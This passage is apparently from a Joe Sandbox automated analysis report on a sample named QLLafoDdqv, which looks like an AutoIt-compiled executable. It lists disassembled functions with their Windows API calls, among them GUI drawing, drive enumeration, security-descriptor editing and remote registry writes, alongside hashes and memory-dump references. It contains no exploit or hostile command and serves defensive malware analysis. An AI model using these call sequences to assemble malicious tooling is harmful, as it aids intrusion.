              • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00752E52
              • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0075303F
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
              • String ID: $AutoIt v3$DISPLAY$static
              • API String ID: 2211948467-2373415609
              • Opcode ID: f5595ed05157340c7329c10a2d959f1f58b19d3bff0d5c2eab9e6e32c35dd2e4
              • Instruction ID: 14c82aa4abbbfd0fa01d2a284d004b6a8ef68a0de11b8e12991e8fc07b1321b2
              • Opcode Fuzzy Hash: f5595ed05157340c7329c10a2d959f1f58b19d3bff0d5c2eab9e6e32c35dd2e4
              • Instruction Fuzzy Hash: 89029F71900209EFDB15DF64DC89EAE7BB9FB49311F008109F915AB2A1DBB8AD05CF64
              Function 007670D5 Relevance: 49.8, APIs: 33, Instructions: 273COMMON
              Download Yara Rule
              APIs
              • SetTextColor.GDI32(?,00000000), ref: 0076712F
              • GetSysColorBrush.USER32(0000000F), ref: 00767160
              • GetSysColor.USER32(0000000F), ref: 0076716C
              • SetBkColor.GDI32(?,000000FF), ref: 00767186
              • SelectObject.GDI32(?,?), ref: 00767195
              • InflateRect.USER32(?,000000FF,000000FF), ref: 007671C0
              • GetSysColor.USER32(00000010), ref: 007671C8
              • CreateSolidBrush.GDI32(00000000), ref: 007671CF
              • FrameRect.USER32(?,?,00000000), ref: 007671DE
              • DeleteObject.GDI32(00000000), ref: 007671E5
              • InflateRect.USER32(?,000000FE,000000FE), ref: 00767230
              • FillRect.USER32(?,?,?), ref: 00767262
              • GetWindowLongW.USER32(?,000000F0), ref: 00767284
                • Part of subcall function 007673E8: GetSysColor.USER32(00000012), ref: 00767421
                • Part of subcall function 007673E8: SetTextColor.GDI32(?,?), ref: 00767425
                • Part of subcall function 007673E8: GetSysColorBrush.USER32(0000000F), ref: 0076743B
                • Part of subcall function 007673E8: GetSysColor.USER32(0000000F), ref: 00767446
                • Part of subcall function 007673E8: GetSysColor.USER32(00000011), ref: 00767463
                • Part of subcall function 007673E8: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00767471
                • Part of subcall function 007673E8: SelectObject.GDI32(?,00000000), ref: 00767482
                • Part of subcall function 007673E8: SetBkColor.GDI32(?,00000000), ref: 0076748B
                • Part of subcall function 007673E8: SelectObject.GDI32(?,?), ref: 00767498
                • Part of subcall function 007673E8: InflateRect.USER32(?,000000FF,000000FF), ref: 007674B7
                • Part of subcall function 007673E8: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 007674CE
                • Part of subcall function 007673E8: GetWindowLongW.USER32(00000000,000000F0), ref: 007674DB
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
              • String ID:
              • API String ID: 4124339563-0
              • Opcode ID: e679133389053e40739a3b6ed7e48c308c845f9dd4765d4aa0c3ca1af43bba65
              • Instruction ID: 4b0e5bbc4b233345bf4b39c2bd8dd3a77010c4f2737830aa4d694ecc755e83cf
              • Opcode Fuzzy Hash: e679133389053e40739a3b6ed7e48c308c845f9dd4765d4aa0c3ca1af43bba65
              • Instruction Fuzzy Hash: F6A1C172008305EFDB069F60DC48E6B7BA9FF89364F104A19F9A3961E1D7B8E844CB55
              Function 006E8D85 Relevance: 47.7, APIs: 26, Strings: 1, Instructions: 480windowCOMMON
              Download Yara Rule
              APIs
              • DestroyWindow.USER32(?,?), ref: 006E8E14
              • SendMessageW.USER32(?,00001308,?,00000000), ref: 00726AC5
              • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00726AFE
              • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00726F43
                • Part of subcall function 006E8F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,006E8BE8,?,00000000,?,?,?,?,006E8BBA,00000000,?), ref: 006E8FC5
              • SendMessageW.USER32(?,00001053), ref: 00726F7F
              • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00726F96
              • ImageList_Destroy.COMCTL32(00000000,?), ref: 00726FAC
              • ImageList_Destroy.COMCTL32(00000000,?), ref: 00726FB7
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: DestroyImageList_MessageSend$Window$InvalidateMoveRectRemove
              • String ID: 0
              • API String ID: 2760611726-4108050209
              • Opcode ID: 3f420435c19c67cce9ef405d329a357a3800991e6031a5731dfce5f5256c87bd
              • Instruction ID: c724ab0eb826f205c56a2924846857079c5eaca632d4beb3d7aa03b8300cf4ff
              • Opcode Fuzzy Hash: 3f420435c19c67cce9ef405d329a357a3800991e6031a5731dfce5f5256c87bd
              • Instruction Fuzzy Hash: AB12DE306012A1DFDB25DF24E844BB6B7E2FB45300F54846AF5898B261CB39EC92DF95
              Function 00752711 Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 330windowCOMMON
              Download Yara Rule
              APIs
              • DestroyWindow.USER32(00000000), ref: 0075273E
              • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 0075286A
              • SetRect.USER32(?,00000000,00000000,0000012C,?), ref: 007528A9
              • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 007528B9
              • CreateWindowExW.USER32(00000008,AutoIt v3,?,88C00000,000000FF,?,?,?,00000000,00000000,00000000), ref: 00752900
              • GetClientRect.USER32(00000000,?), ref: 0075290C
              • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000), ref: 00752955
              • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00752964
              • GetStockObject.GDI32(00000011), ref: 00752974
              • SelectObject.GDI32(00000000,00000000), ref: 00752978
              • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?), ref: 00752988
              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00752991
              • DeleteDC.GDI32(00000000), ref: 0075299A
              • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 007529C6
              • SendMessageW.USER32(00000030,00000000,00000001), ref: 007529DD
              • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,-0000001D,00000104,00000014,00000000,00000000,00000000), ref: 00752A1D
              • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00752A31
              • SendMessageW.USER32(00000404,00000001,00000000), ref: 00752A42
              • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000041,00000500,-00000027,00000000,00000000,00000000), ref: 00752A77
              • GetStockObject.GDI32(00000011), ref: 00752A82
              • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00752A8D
              • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?,?,?), ref: 00752A97
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
              • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
              • API String ID: 2910397461-517079104
              • Opcode ID: d18e94631bf90796df279ce995486a89449f235ee8da0f223f79b8259d6598ab
              • Instruction ID: 3b431d28ec751e0e2ab31efd205dc064d2ec17bd1ac2c34280db8d5a36c3aeaa
              • Opcode Fuzzy Hash: d18e94631bf90796df279ce995486a89449f235ee8da0f223f79b8259d6598ab
              • Instruction Fuzzy Hash: 6EB19FB1A00215AFEB14DFA8DC45FAE7BA9EB49711F008115F915E7291D7B8ED00CF98
              Function 00744ADF Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 191COMMON
              Download Yara Rule
              APIs
              • SetErrorMode.KERNEL32(00000001), ref: 00744AED
              • GetDriveTypeW.KERNEL32(?,0076CB68,?,\\.\,0076CC08), ref: 00744BCA
              • SetErrorMode.KERNEL32(00000000,0076CB68,?,\\.\,0076CC08), ref: 00744D36
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: ErrorMode$DriveType
              • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
              • API String ID: 2907320926-4222207086
              • Opcode ID: 529dcb761114f399433c4dfc1f8dca62882209177102c791c74b0f918ba0c289
              • Instruction ID: 3a58bc7a985b63cb0183a992cc02bb70f01550bdfcd92e2eeda452b9ffbda9ef
              • Opcode Fuzzy Hash: 529dcb761114f399433c4dfc1f8dca62882209177102c791c74b0f918ba0c289
              • Instruction Fuzzy Hash: 7E61AFB0B05205DBCF04DF24DAD2A78B7B1EB05341B28851AF806AB691DB3DED41FB65
              Function 007673E8 Relevance: 39.2, APIs: 26, Instructions: 201windowCOMMON
              Download Yara Rule
              APIs
              • GetSysColor.USER32(00000012), ref: 00767421
              • SetTextColor.GDI32(?,?), ref: 00767425
              • GetSysColorBrush.USER32(0000000F), ref: 0076743B
              • GetSysColor.USER32(0000000F), ref: 00767446
              • CreateSolidBrush.GDI32(?), ref: 0076744B
              • GetSysColor.USER32(00000011), ref: 00767463
              • CreatePen.GDI32(00000000,00000001,00743C00), ref: 00767471
              • SelectObject.GDI32(?,00000000), ref: 00767482
              • SetBkColor.GDI32(?,00000000), ref: 0076748B
              • SelectObject.GDI32(?,?), ref: 00767498
              • InflateRect.USER32(?,000000FF,000000FF), ref: 007674B7
              • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 007674CE
              • GetWindowLongW.USER32(00000000,000000F0), ref: 007674DB
              • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0076752A
              • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00767554
              • InflateRect.USER32(?,000000FD,000000FD), ref: 00767572
              • DrawFocusRect.USER32(?,?), ref: 0076757D
              • GetSysColor.USER32(00000011), ref: 0076758E
              • SetTextColor.GDI32(?,00000000), ref: 00767596
              • DrawTextW.USER32(?,007670F5,000000FF,?,00000000), ref: 007675A8
              • SelectObject.GDI32(?,?), ref: 007675BF
              • DeleteObject.GDI32(?), ref: 007675CA
              • SelectObject.GDI32(?,?), ref: 007675D0
              • DeleteObject.GDI32(?), ref: 007675D5
              • SetTextColor.GDI32(?,?), ref: 007675DB
              • SetBkColor.GDI32(?,?), ref: 007675E5
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
              • String ID:
              • API String ID: 1996641542-0
              • Opcode ID: c9eb317c55a8b1870ec34115657b56dafaa7ad51c22af75ed506e9f3000f30c3
              • Instruction ID: 5e77953fe0ae5e53e073ba6c4d726d11ad724c936057cc3fc1a2ae2c0381b77a
              • Opcode Fuzzy Hash: c9eb317c55a8b1870ec34115657b56dafaa7ad51c22af75ed506e9f3000f30c3
              • Instruction Fuzzy Hash: 2C616072900218AFDF069FA4DC49EAE7F79EF09360F118115F916AB2A1D7B89940CF94
              Function 00760FF3 Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 284windowCOMMON
              Download Yara Rule
              APIs
              • GetCursorPos.USER32(?), ref: 00761128
              • GetDesktopWindow.USER32 ref: 0076113D
              • GetWindowRect.USER32(00000000), ref: 00761144
              • GetWindowLongW.USER32(?,000000F0), ref: 00761199
              • DestroyWindow.USER32(?), ref: 007611B9
              • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,7FFFFFFD,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 007611ED
              • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0076120B
              • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0076121D
              • SendMessageW.USER32(00000000,00000421,?,?), ref: 00761232
              • SendMessageW.USER32(00000000,0000041D,00000000,00000000), ref: 00761245
              • IsWindowVisible.USER32(00000000), ref: 007612A1
              • SendMessageW.USER32(00000000,00000412,00000000,D8F0D8F0), ref: 007612BC
              • SendMessageW.USER32(00000000,00000411,00000001,00000030), ref: 007612D0
              • GetWindowRect.USER32(00000000,?), ref: 007612E8
              • MonitorFromPoint.USER32(?,?,00000002), ref: 0076130E
              • GetMonitorInfoW.USER32(00000000,?), ref: 00761328
              • CopyRect.USER32(?,?), ref: 0076133F
              • SendMessageW.USER32(00000000,00000412,00000000), ref: 007613AA
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
              • String ID: ($0$tooltips_class32
              • API String ID: 698492251-4156429822
              • Opcode ID: 51f1f5a2ef300bdacf789e752000f07e32a24241baa57f5194a2af815d7a2a3f
              • Instruction ID: dfedbd7fac7fcbcedf2abbcb37c2fb22ad7444279f19c7ed3efc658e5483ad75
              • Opcode Fuzzy Hash: 51f1f5a2ef300bdacf789e752000f07e32a24241baa57f5194a2af815d7a2a3f
              • Instruction Fuzzy Hash: 90B1BC71604341AFDB44DF64C888B6ABBE4FF88300F44891DF99A9B2A1C774E844CB96
              Function 00760241 Relevance: 35.4, APIs: 7, Strings: 13, Instructions: 391windowCOMMON
              Download Yara Rule
              APIs
              • CharUpperBuffW.USER32(?,?), ref: 007602E5
              • _wcslen.LIBCMT ref: 0076031F
              • _wcslen.LIBCMT ref: 00760389
              • _wcslen.LIBCMT ref: 007603F1
              • _wcslen.LIBCMT ref: 00760475
              • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 007604C5
              • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00760504
                • Part of subcall function 006EF9F2: _wcslen.LIBCMT ref: 006EF9FD
                • Part of subcall function 0073223F: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00732258
                • Part of subcall function 0073223F: SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 0073228A
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: _wcslen$MessageSend$BuffCharUpper
              • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
              • API String ID: 1103490817-719923060
              • Opcode ID: b0687760aadea202d0b29d0894d8dc8c0343f313711977c67ba5a1b79036be7c
              • Instruction ID: 66262d7673ca1f9feee3293f4e2ffc4d412a22eedae870d1cc206f5c3b4961b6
              • Opcode Fuzzy Hash: b0687760aadea202d0b29d0894d8dc8c0343f313711977c67ba5a1b79036be7c
              • Instruction Fuzzy Hash: 75E19C312182418FCB28DF24C45083BB7E6BF89314B14496DF8979B3A2DB38ED45CB91
              Function 006E8891 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 282windowtimeCOMMON
              Download Yara Rule
              APIs
              • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 006E8968
              • GetSystemMetrics.USER32(00000007), ref: 006E8970
              • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 006E899B
              • GetSystemMetrics.USER32(00000008), ref: 006E89A3
              • GetSystemMetrics.USER32(00000004), ref: 006E89C8
              • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 006E89E5
              • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 006E89F5
              • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 006E8A28
              • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 006E8A3C
              • GetClientRect.USER32(00000000,000000FF), ref: 006E8A5A
              • GetStockObject.GDI32(00000011), ref: 006E8A76
              • SendMessageW.USER32(00000000,00000030,00000000), ref: 006E8A81
                • Part of subcall function 006E912D: GetCursorPos.USER32(?), ref: 006E9141
                • Part of subcall function 006E912D: ScreenToClient.USER32(00000000,?), ref: 006E915E
                • Part of subcall function 006E912D: GetAsyncKeyState.USER32(00000001), ref: 006E9183
                • Part of subcall function 006E912D: GetAsyncKeyState.USER32(00000002), ref: 006E919D
              • SetTimer.USER32(00000000,00000000,00000028,006E90FC), ref: 006E8AA8
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
              • String ID: AutoIt v3 GUI
              • API String ID: 1458621304-248962490
              • Opcode ID: 90ca036b657eb90872723f3038cff3e8c8f60c3b23119ed548afd0cfc702bdf6
              • Instruction ID: fe331e6d99001d01456d9528e8ce7a5db171a5cce4727d6a11fed194aaf2b0c1
              • Opcode Fuzzy Hash: 90ca036b657eb90872723f3038cff3e8c8f60c3b23119ed548afd0cfc702bdf6
              • Instruction Fuzzy Hash: 00B18F75A003599FDB14DFA8DC45BAE3BB5FB48314F10822AFA16A7290DB78E841CF54
              Function 00730D8B Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON
              Download Yara Rule
              APIs
                • Part of subcall function 007310F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00731114
                • Part of subcall function 007310F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,00730B9B,?,?,?), ref: 00731120
                • Part of subcall function 007310F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00730B9B,?,?,?), ref: 0073112F
                • Part of subcall function 007310F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00730B9B,?,?,?), ref: 00731136
                • Part of subcall function 007310F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0073114D
              • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00730DF5
              • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00730E29
              • GetLengthSid.ADVAPI32(?), ref: 00730E40
              • GetAce.ADVAPI32(?,00000000,?), ref: 00730E7A
              • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00730E96
              • GetLengthSid.ADVAPI32(?), ref: 00730EAD
              • GetProcessHeap.KERNEL32(00000008,00000008), ref: 00730EB5
              • HeapAlloc.KERNEL32(00000000), ref: 00730EBC
              • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00730EDD
              • CopySid.ADVAPI32(00000000), ref: 00730EE4
              • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00730F13
              • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00730F35
              • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00730F47
              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00730F6E
              • HeapFree.KERNEL32(00000000), ref: 00730F75
              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00730F7E
              • HeapFree.KERNEL32(00000000), ref: 00730F85
              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00730F8E
              • HeapFree.KERNEL32(00000000), ref: 00730F95
              • GetProcessHeap.KERNEL32(00000000,?), ref: 00730FA1
              • HeapFree.KERNEL32(00000000), ref: 00730FA8
                • Part of subcall function 00731193: GetProcessHeap.KERNEL32(00000008,00730BB1,?,00000000,?,00730BB1,?), ref: 007311A1
                • Part of subcall function 00731193: HeapAlloc.KERNEL32(00000000,?,00000000,?,00730BB1,?), ref: 007311A8
                • Part of subcall function 00731193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00730BB1,?), ref: 007311B7
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
              • String ID:
              • API String ID: 4175595110-0
              • Opcode ID: e0830977437497ec22398bdbf383c3b791d1770c116ca8d3355a8563cac0c123
              • Instruction ID: c366cb2ccd8912e91f2d12477ee66689e63de2c464b4d817d65b030004802b09
              • Opcode Fuzzy Hash: e0830977437497ec22398bdbf383c3b791d1770c116ca8d3355a8563cac0c123
              • Instruction Fuzzy Hash: 79715FB190020AEBEF219FA4DC49FBEBBB8BF05700F048115F959A6152D7799A05CBA0
              Function 0075C3B7 Relevance: 30.2, APIs: 11, Strings: 6, Instructions: 495registryCOMMON
              Download Yara Rule
              APIs
              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0075C4BD
              • RegCreateKeyExW.ADVAPI32(?,?,00000000,0076CC08,00000000,?,00000000,?,?), ref: 0075C544
              • RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 0075C5A4
              • _wcslen.LIBCMT ref: 0075C5F4
              • _wcslen.LIBCMT ref: 0075C66F
              • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000001,?,?), ref: 0075C6B2
              • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 0075C7C1
              • RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 0075C84D
              • RegCloseKey.ADVAPI32(?), ref: 0075C881
              • RegCloseKey.ADVAPI32(00000000), ref: 0075C88E
              • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 0075C960
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: Value$Close$_wcslen$ConnectCreateRegistry
